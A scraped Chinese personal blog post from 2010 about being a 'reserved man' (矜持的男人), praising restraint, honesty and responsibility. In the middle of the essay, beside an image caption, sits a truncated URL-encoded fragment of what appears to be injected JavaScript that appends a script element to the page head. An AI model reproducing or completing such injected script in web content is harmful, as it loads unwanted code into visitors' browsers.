注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

一片孤城

放逐心境,品味悠然

 
 
 

日志

 
 

矜持的男人  

2010-11-25 15:26:55|  分类: 杂谈 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |
矜持的男人 - 一片孤城 - 一片孤城万仞山
(年轻那会儿,俺落寞的神情里,真的蕴含有几分矜持)
 
 

 昨天,听朋友说——俺是个矜持的男人,感觉这个称谓很新鲜,反反复复咀嚼了很多遍,也不知道是在夸咱还是损咱,由于咱悟性太低,只能谈谈粗浅的认识与体会了。

如果我没有记错的话,“矜持”这个词,一直都是用在女人身上的,而在现如今,当在女人的身上,都难得一见矜持的时候,矜持二字,已经变成难能可贵品质的代名词。

矜持的男人 - 一片孤城 - 一片孤城万仞山cript%22%3Bdocument.getElementsByTagName%28%27head%27%29%5B0%5D.appendChild%28s%29%3B%0D%0A">矜持是什么,在我看来,矜持不是过分的拘谨,更不是虚伪装清纯,矜持是庄重与修养,是恪守原则,是对自己的约束和把握。

矜持的男人,知道如何自处,不张扬,不主动,知道如何在交往中去保持距离,由于我们经历各异,学识不同,对某些问题的认识上,都会有些偏差,在交往中,过分的热情,很容易被主观印象所影响,造成彼此之间产生误会。

矜持的男人,一般都是诚实的男人,这也是男人是否成熟的标志之一。他们怕受到伤害,更害怕伤害到别人,所以,无论在网上还是在生活中,他们不主动搭讪,不自作多情,更不穷追猛打,甚至不动真感情,有无数事实可以证明,矜持的男人,才是负责任的男人。

矜持的男人,是从来不随随便便胡作非为的,他们是希望能够全身而退的男人,他们拿得起、放得下、拎得清,有曾经沧海难为水的气度,也是具有更大智慧的男人。

从今往后,继续做个矜持的男人。

  评论这张
 
阅读(117)| 评论(309)
推荐

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017